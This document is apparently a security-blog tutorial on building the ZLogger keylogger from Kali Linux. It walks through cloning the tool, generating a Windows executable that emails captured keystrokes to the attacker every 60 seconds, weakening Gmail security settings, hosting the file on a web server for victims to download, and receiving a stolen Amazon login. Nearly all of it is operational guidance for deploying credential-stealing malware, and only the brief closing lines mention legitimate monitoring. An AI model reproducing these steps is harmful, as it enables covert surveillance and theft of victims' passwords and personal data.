Keyloggers are a form of monitoring software that records a user’s keystrokes. These keystroke loggers, one of the oldest types of cyber attack, record the information you type into a website or application and send it to a third party.
ZLogger is one of the python-based keyloggers written by a security professional, Zaid Al-Quraishi. The main feature of this tool is to create a persistent keylogger for Windows and Linux operating systems. This tool does not require admin privileges, and it starts with a system startup. It captures every key strobe and sends a report via email to an attacker.
To download ZLogger, visit the following page “https://github.com/z00z/ZLogger” and copy the downloadable link.
Open your terminal and download the tool using the “git clone” command.
Ex: (root@kali:/opt# git clone https://github.com/z00z/ZLogger.git).
Next, change your directory to “ZLogger” and list the contents.
To run the program, we need to use the “python” command, and to specify some options first, we need to list all available options with the “ – – help” operator.
Ex : (root@kali:/opt/ZLogger# python zlogger.py – – help).
Now let’s create a keylogger and see it in action. In this example, we’ll be targeting the windows based operating system using the “-w” option with the interval “-i” of 60 seconds. So every minute, our keylogger will send a report. Next, we need to provide our email address using the “-e” option and a password “-p” of the email account. We need to provide this information, so the keylogger knows where to send the captured data. Lastly, we output our keylogger file using the “-o” option.
Ex: (root@kali:/opt/ZLogger# python zlogger.py -i 60 -w -e jdoe76781@gmail.com -p johndoesecurity -o please_click_me_I_am_not_a_keylogger).
Once the keylogger completes the process, it will be saved in the “ZLogger/dist/” directory as a “please_click_me_I_am_not_a_keylogger” file. Before executing this file on the target computer, don’t forget to allow less secure applications in your Gmail account. Use the following link to do so “https://myaccount.google.com/lesssecureapps.”
Next, copy the file to our web server so it can be reached and downloaded easily from the target computer.
Ex: (root@kali:/opt/ZLogger/dist# cp please_click_me_I_am_not_a_keylogger.exe /var/www/html/Evil-Files/).
Now let’s download it to our victim PC and see it in action.
Once our victim runs the executable and tries to type or browse something, our keylogger will capture and send them to our email address.
As it is shown in the image below, we were managed to receive a report from ZLogger with a captured username and password from Amazon.
Keyloggers are used by criminals to steal personal or financial information, such as banking information, which they then sell or use for profit. They do, however, have legitimate uses in the workplace, such as troubleshooting, improving user experience, and monitoring employees. Keylogging is also used for monitoring by law enforcement and intelligence agencies.